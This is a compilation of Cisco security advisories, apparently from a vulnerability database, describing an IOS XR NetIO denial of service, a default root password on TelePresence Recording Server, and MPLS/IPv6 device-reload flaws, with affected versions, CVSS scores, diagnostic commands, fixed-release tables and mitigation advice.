This vulnerability affects any device that is running Cisco IOS XR Software Releases 3.8.3, 3.8.4, or 3.9.1 and has an IPv4 address configured on one of the interfaces of a Cisco Line Card or Cisco CRS MSC.

Vulnerable Products
+------------------

Cisco IOS XR Software Releases 3.8.3, 3.8.4, and 3.9.1 are affected when they are running on the following Cisco hardware platforms:

  * Cisco ASR 9000 Series Aggregation Services Routers
  * Cisco Carrier Routing System
  * Cisco XR 12000 Series Routers

To determine the Cisco IOS XR Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The software version is displayed after the text "Cisco IOS XR Software". The following example identifies a Cisco XR 12000 Series Router that is running Cisco IOS XR Software Release 3.9.1:

    RP/0/0/CPU0:example#show version
    Wed Dec 15 10:16:47.117 singa
    Cisco IOS XR Software, Version 3.9.1[00]
    Copyright (c) 2010 by Cisco Systems, Inc.
    ROM: System Bootstrap, Version 12.0(20090302:133850) [rtauro-sw30346-33S 1.23dev(0.36)] DEVELOPMENT SOFTWARE
    Copyright (c) 1994-2009 by cisco Systems, Inc.
    example uptime is 26 minutes
    System image file is "disk0:c12k-os-mbi-3.9.1/mbiprp-rp.vm"
    cisco 12404/PRP (7457) processor with 3145728K bytes of memory.
    7457 processor at 1266Mhz, Revision 1.2
    1 Cisco 12000 Series Performance Route Processor
    1 Cisco 12000 Series SPA Interface Processor-601/501/401
    1 Cisco 12000 4 Port Gigabit Ethernet Controller (4 GigabitEthernet)
    3 Management Ethernet
    5 PLIM_QOS
    8 FastEthernet
    4 GigabitEthernet/IEEE 802.3 interface(s)
    1019k bytes of non-volatile configuration memory.
    982304k bytes of disk0: (Sector size 512 bytes).
    62420k bytes of disk1: (Sector size 512 bytes).
    65536k bytes of Flash internal SIMM (Sector size 256k).

The following products are not affected by this vulnerability:

  * Cisco IOS Software
  * Cisco IOS XE Software for Cisco ASR 1000 Series Routers
  * Cisco NX-OS Software

No other Cisco products are currently known to be affected by this vulnerability.

Details
=======

Cisco IOS XR Software, which is part of the Cisco IOS Software family, uses a microkernel-based distributed operating system infrastructure. Cisco IOS XR Software runs on the Cisco CRS, Cisco 12000 Series Routers, and Cisco ASR 9000 Series Aggregation Services Routers.

When a Cisco Line Card or Cisco CRS MSC sends a specific IPv4 packet, the NetIO process will restart. Although a crash is caused by a packet that originates from the Cisco Line Card or Cisco CRS MSC, an unauthenticated, remote user can trigger the vulnerability by sending specific IP packets to or through the device. In the latter scenario, the Cisco Line Card or Cisco CRS MSC will create the specific IPv4 packet response that triggers the vulnerability.

This vulnerability is documented in Cisco bug ID CSCth44147 (registered customers only) and has been assigned CVE ID CVE-2011-0943.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss

* CSCth44147: NetIO Process crashes when generating specific IP packet

CVSS Base Score - 7.8
    Access Vector          - Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - None
    Integrity Impact       - None
    Availability Impact    - Complete

CVSS Temporal Score - 6.4
    Exploitability         - Functional
    Remediation Level      - Official-Fix
    Report Confidence      - Confirmed

Impact
======

Successful exploitation of the vulnerability may result in a reload of the Cisco CRS MSC on a Cisco CRS or the line cards on a Cisco 12000 Series Router or Cisco ASR 9000 Series Aggregation Services Router. Repeated exploitation could result in a sustained DoS condition.

Software Versions and Fixes
===========================

When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

+---------------------------------------------------------------+
|   Major   |         Availability of Repaired Releases         |
|  Release  |                                                   |
|-----------+---------------------------------------------------|
| Affected  |          |                             |          |
| 3.2.X     |          |                             | First    |
| through   | SMU ID   | SMU NAME                    | Fixed    |
| 3.7.X -   |          |                             | Release  |
| Based     |          |                             |          |
| Releases  |          |                             |          |
|---------------------------------------------------------------|
| There are no affected 3.2.X through 3.7.X - based releases    |
|---------------------------------------------------------------|
| Affected  |          |                             | First    |
| 3.8.X     | SMU ID   | SMU NAME                    | Fixed    |
| Based     |          |                             | Release  |
| Releases  |          |                             |          |
|-----------+---------------------------------------------------|
| 3.8.0     | Not Vulnerable.                                   |
|-----------+---------------------------------------------------|
| 3.8.1     | Not Vulnerable.                                   |
|-----------+---------------------------------------------------|
| 3.8.2     | Not Vulnerable.                                   |
|-----------+---------------------------------------------------|
|           | CRS:     |                             | No first |
|           | AA04566  | hfr-base-3.8.3.CSCth44147   | fixed    |
|           |          |                             | release; |
|           |----------+-----------------------------| migrate  |
| 3.8.3     | ASR9K    | Not Applicable              | to       |
|           |          |                             | 3.9.X,   |
|           |----------+-----------------------------| 4.0.X,   |
|           | XR12000  | Not Applicable              | or       |
|           |          |                             | later.   |
|-----------+----------+-----------------------------+----------|
|           | CRS:     |                             | No first |
|           | AA04565  | hfr-base-3.8.4.CSCth44147   | fixed    |
|           |          |                             | release; |
|           |----------+-----------------------------| migrate  |
| 3.8.4     | ASR9K    | Not Applicable              | to       |
|           |          |                             | 3.9.2,   |
|           |----------+-----------------------------| 4.X.0,   |
|           | XR12000: |                             | or       |
|           | AA04567  | c12k-base-3.8.4.CSCth44147  | later.   |
|-----------+----------+-----------------------------+----------|
| Affected  |          |                             | First    |
| 3.9.X     | SMU ID   | SMU NAME                    | Fixed    |
| Based     |          |                             | Release  |
| Releases  |          |                             |          |
|-----------+---------------------------------------------------|
| 3.9.0     | Not Vulnerable.                                   |
|-----------+---------------------------------------------------|
|           | CRS:     | hfr-base-3.9.1.CSCth44147   |          |
|           | AA04564  |                             |          |
|           |----------+-----------------------------|          |
| 3.9.1     | ASR9K:   | asr9k-base-3.9.1.CSCth44147 | 3.9.2    |
|           | AA04563  |                             |          |
|           |----------+-----------------------------|          |
|           | XR12000: | c12k-base-3.9.1.CSCth44147  |          |
|           | AA04530  |                             |          |
|-----------+---------------------------------------------------|
| 3.9.2     | Not Vulnerable.                                   |
|-----------+---------------------------------------------------|
| Affected  |                                                   |
| 4.0.X -   | There are no affected 4.0.X - based releases      |
| based     |                                                   |
| Releases. |                                                   |
|-----------+---------------------------------------------------|
| Affected  |                                                   |
| 4.1.X     | There are no affected 4.1.X based releases.       |
| Based     |                                                   |
| Releases  |                                                   |
+---------------------------------------------------------------+

Workarounds
===========

There are no workarounds for this vulnerability.

Using Infrastructure Access Control Lists (iACLs) may help limit the attack surface of this vulnerability. Although it is often difficult to block traffic that transits a network, it is possible to identify traffic that should never be allowed to target infrastructure devices and block that traffic at the border of networks. iACLs are a network security best practice and should be considered as a long-term addition to good network security.

Because some packets that may be used to exploit this vulnerability could utilize UDP as a transport, an attacker could spoof the sender's IP address, which may defeat ACLs that permit communication to these ports from trusted IP addresses.
To provide a better mitigation solution, administrators should consider using Unicast Reverse Path Forwarding (Unicast RPF) in conjunction with iACLs. For more information on iACLs, consult the document "Limit Network Access with Access Control Lists" at the following link: http://www.cisco.com/web/about/security/intelligence/CiscoIOSXR.html#19 Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. 
The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was discovered during the handling of customer support calls. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. 
YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+--------------+-------------+-------------------------+
| Revision 1.0 | 2011-May-25 | Initial public release. |
+--------------+-------------+-------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt

Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
VAR-201108-0097 CVE-2011-2555 Cisco TelePresence Recording Server Vulnerabilities whose settings are changed CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Cisco TelePresence Recording Server 1.7.2.x before 1.7.2.1 has a default password for the root administrator account, which makes it easier for remote attackers to modify the configuration via an SSH session, aka Bug ID CSCtr76182. A third party may change the settings through an SSH session. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. An attacker can exploit this issue to gain unauthorized administrative access to the affected device. Successful exploits will result in the complete compromise of the affected device. This issue is being tracked by Cisco bug ID CSCtr76182. A workaround exists to mitigate this vulnerability. Cisco has released free software updates that address this vulnerability.

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by this vulnerability.

Details
=======

The Cisco TelePresence solution allows an immersive, in-person communication and collaboration over the network with colleagues, prospects, and partners, even when they are located in opposite hemispheres.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtr76182 - Root account enabled with default password

CVSS Base Score - 10
    Access Vector          - Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - Complete
    Integrity Impact       - Complete
    Availability Impact    - Complete

CVSS Temporal Score - 8.7
    Exploitability         - High
    Remediation Level      - Official-Fix
    Report Confidence      - Confirmed

Impact
======

Successful exploitation of this vulnerability could allow a remote attacker to use these default credentials to modify the system configuration and settings.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

Workarounds
===========

A workaround exists to mitigate and fix this vulnerability. The workaround requires manual intervention on the affected system. Please contact the Cisco Technical Assistance Center (TAC) for instructions on how to implement this workaround.
Additional mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Intelligence companion document for this advisory: http://www.cisco.com/warp/public/707/cisco-amb-20110729-tp.shtml

Obtaining Fixed Software
========================

Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
================================

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers without Service Contracts
===================================

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

Potential exploitation was reported directly to Cisco by a single customer. The PSIRT is not aware of any widespread exploitation or public announcements of this vulnerability.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110729-tp.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+--------------+--------------+-------------------------+
| Revision 1.0 | 2011-July-29 | Initial public release. |
+--------------+--------------+-------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt

Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
VAR-201110-0250 CVE-2011-3282 Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities

Related entries in the VARIoT exploits database: VAR-E-201109-0355
CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in Cisco IOS 12.2SRE before 12.2(33)SRE4, 15.0, and 15.1, and IOS XE 2.1.x through 3.3.x, when an MPLS domain is configured, allows remote attackers to cause a denial of service (device reload) via an ICMPv6 packet, related to an expired MPLS TTL, aka Bug ID CSCtj30155. A third party may cause a service disruption (device reload) via ICMPv6 packets. Cisco IOS is prone to multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to cause an affected device to reload, denying service to legitimate users. These issues are being tracked by Cisco Bug IDs CSCto07919 and CSCtj30155.

TITLE: Cisco IOS MPLS IPv6 and ICMPv6 Packet Processing Two Denial of Service Vulnerabilities
SECUNIA ADVISORY ID: SA46145
VERIFY ADVISORY: http://secunia.com/advisories/46145/
RELEASE DATE: 2011-10-31
DESCRIPTION: Two vulnerabilities have been reported in Cisco IOS, which can be exploited by malicious people to cause a DoS (Denial of Service). Please see the vendor's advisory for a list of affected versions.
SOLUTION: Update to a fixed version (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6mpls.shtml

For more information: SA46145 The vulnerabilities are reported in versions 2.1.x through 2.6.x and 3.2.xS.
These vulnerabilities are:

* Crafted IPv6 Packet May Cause MPLS-Configured Device to Reload
* ICMPv6 Packet May Cause MPLS-Configured Device to Reload

Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6mpls.shtml.

Note: The September 28, 2011, Cisco IOS Software Security Advisory bundled publication includes ten Cisco Security Advisories. Each advisory lists the Cisco IOS Software releases that correct the vulnerability or vulnerabilities detailed in the advisory as well as the Cisco IOS Software releases that correct all vulnerabilities in the September 2011 Bundled Publication.

Individual publication links are in "Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication" at the following link: http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html

Affected Products
=================

Vulnerable Products
+------------------

Cisco IOS Software or Cisco IOS XE Software devices (hereafter both referenced as Cisco IOS Software in this document) that are running vulnerable versions of Cisco IOS Software and configured for MPLS are affected by two vulnerabilities related to IPv6 traffic that traverses an MPLS domain. The two vulnerabilities are independent of each other.

Note: IPv6 does not need to be configured on the affected devices themselves. The vulnerabilities do require the MPLS label switched packets to have specific IPv6 payloads to be exploited.

To determine whether a device is configured for MPLS, log in to the device and issue the command-line interface (CLI) command "show mpls interface". If the IP state is "Yes", the device is vulnerable.
The following example shows a device that has MPLS configured on interface Ethernet0/0:

    Router#show mpls interface
    Interface              IP            Tunnel   BGP Static Operational
    Ethernet0/0            Yes (ldp)     No       No  No     Yes
    Router#

The following two examples show responses from a device with MPLS forwarding disabled. The first example shows a return of no interfaces:

    router#show mpls interface
    Interface              IP            Tunnel   BGP Static Operational
    routers#

In the second example, the device provides a message indicating that MPLS forwarding is not configured:

    router#show mpls interface
    no MPLS apps enabled or MPLS not enabled on any interfaces
    router#

To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the "show version" command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to "Cisco Internetwork Operating System Software" or "Cisco IOS Software." The image name displays in parentheses, followed by "Version" and the Cisco IOS Software release name. Other Cisco devices do not have the "show version" command or may provide different output.

The following example identifies a Cisco product that is running Cisco IOS Software Release 15.0(1)M1 with an installed image name of C3900-UNIVERSALK9-M:

    Router> show version
    Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2009 by Cisco Systems, Inc.
    Compiled Wed 02-Dec-09 17:17 by prod_rel_team

    !--- output truncated

Additional information about Cisco IOS Software release naming conventions is available in the white paper Cisco IOS and NX-OS Software Reference Guide at http://www.cisco.com/web/about/security/intelligence/ios-ref.html.

Products Confirmed Not Vulnerable
+--------------------------------

Devices that are not configured for MPLS are not vulnerable.
Details
=======

The packet handling nodes in an MPLS network are called provider routers (P routers) and provider edge routers (PE routers) and are configured with MPLS. Both P and PE routers are vulnerable to both the vulnerabilities disclosed in this advisory.

In networks that have MPLS enabled and could carry MPLS label switched packets with IPv6 payloads, the device may crash when processing MPLS label switched packets with specific IPv6 payloads. Typical deployment scenarios that would be affected by either vulnerability would be Cisco IPv6 Provider Edge Router (6PE) or IPv6 VPN Provider Edge Router (6VPE).

The crafted packet used to exploit this vulnerability would be silently discarded in Cisco IOS Software if received on an interface where the packet did not have an MPLS label. This vulnerability is documented in Cisco bug ID CSCto07919 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-3274.

The packet used to exploit this vulnerability would not affect Cisco IOS Software if received on an interface where the packet did not have an MPLS label.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss

* CSCto07919 ("Crafted IPv6 packet may cause MPLS configured device to reload")

CVSS Base Score - 6.1
    Access Vector          - Adjacent Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - None
    Integrity Impact       - None
    Availability Impact    - Complete

CVSS Temporal Score - 5.0
    Exploitability         - Functional
    Remediation Level      - Official-Fix
    Report Confidence      - Confirmed

* CSCtj30155 ("ICMPv6 packet may cause MPLS configured device to reload")

CVSS Base Score - 7.8
    Access Vector          - Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - None
    Integrity Impact       - None
    Availability Impact    - Complete

CVSS Temporal Score - 6.4
    Exploitability         - Functional
    Remediation Level      - Official-Fix
    Report Confidence      - Confirmed

Impact
======

Successful exploitation of these vulnerabilities may cause the device to reload. Repeated exploitation could result in a sustained denial of service condition.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.
Additionally, the Cisco IOS Software Checker is available on the Cisco Security Intelligence Operations (SIO) portal at http://tools.cisco.com/security/center/selectIOSVersion.x. It provides several features for checking which Security Advisories affect specified versions of Cisco IOS Software. Cisco IOS Software +----------------- Each row of the following Cisco IOS Software table corresponds to a Cisco IOS Software train. If a particular train is vulnerable, the earliest releases that contain the fix are listed in the First Fixed Release For This Advisory column. The First Fixed Release for All Advisories in the September 2011 Bundled Publication column lists the earliest possible releases that correct all the published vulnerabilities in the Cisco IOS Software Security Advisory bundled publication. Cisco recommends upgrading to the latest available release, where possible. +------------------------------------------------------------+ | Major | Availability of Repaired Releases | | Release | | |------------+-----------------------------------------------| | Affected | | First Fixed Release | | 12.0-Based | First Fixed Release | for All Advisories in | | Releases | For This Advisory | the September 2011 | | | | Bundled Publication | |------------------------------------------------------------| | There are no affected 12.0-based releases | |------------------------------------------------------------| | Affected | | First Fixed Release | | 12.1-Based | First Fixed Release | for All Advisories in | | Releases | For This Advisory | the September 2011 | | | | Bundled Publication | |------------+-----------------------+-----------------------| | 12.1E | Not vulnerable | 12.2(18)SXF17b | |------------+-----------------------+-----------------------| | Affected | | First Fixed Release | | 12.2-Based | First Fixed Release | for All Advisories in | | Releases | For This Advisory | the September 2011 | | | | Bundled Publication | 
|------------+-----------------------+-----------------------| | 12.2 | Not vulnerable | Vulnerable; first | | | | fixed in Release 12.4 | |------------+-----------------------+-----------------------| | 12.2B | Not vulnerable | Vulnerable; first | | | | fixed in Release 12.4 | |------------+-----------------------+-----------------------| | 12.2BC | Not vulnerable | Vulnerable; first | | | | fixed in Release 12.4 | |------------+-----------------------+-----------------------| | 12.2BW | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2BX | Not vulnerable | fixed in Release | | | | 12.2SB | |------------+-----------------------+-----------------------| | 12.2BY | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2BZ | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2CX | Not vulnerable | Vulnerable; first | | | | fixed in Release 12.4 | |------------+-----------------------+-----------------------| | 12.2CY | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2CZ | Not vulnerable | fixed in Release | | | | 12.2SB | |------------+-----------------------+-----------------------| | 12.2DA | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2DD | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2DX | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2EU | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | | | Releases up to and | | 12.2EW | Not vulnerable | including 12.2(20)EW4 | | | | are not vulnerable. 
| |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2EWA | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | 12.2EX | Not vulnerable | 12.2(55)EX3 | |------------+-----------------------+-----------------------| | 12.2EY | Not vulnerable | 12.2(58)EY | |------------+-----------------------+-----------------------| | | | Vulnerable; migrate | | 12.2EZ | Not vulnerable | to any release in | | | | 15.0SE | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2FX | Not vulnerable | fixed in Release | | | | 12.2SE | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2FY | Not vulnerable | fixed in Release | | | | 12.2EX | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2FZ | Not vulnerable | fixed in Release | | | | 12.2SE | |------------+-----------------------+-----------------------| | | | Vulnerable; migrate | | 12.2IRA | Not vulnerable | to any release in | | | | 12.2IRG | |------------+-----------------------+-----------------------| | | | Vulnerable; migrate | | 12.2IRB | Not vulnerable | to any release in | | | | 12.2IRG | |------------+-----------------------+-----------------------| | | | Vulnerable; migrate | | 12.2IRC | Not vulnerable | to any release in | | | | 12.2IRG | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IRD | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. 
| |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IRE | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | | | Vulnerable; migrate | | 12.2IRF | Not vulnerable | to any release in | | | | 12.2IRG | |------------+-----------------------+-----------------------| | 12.2IRG | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXA | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXB | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXC | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXD | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXE | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. 
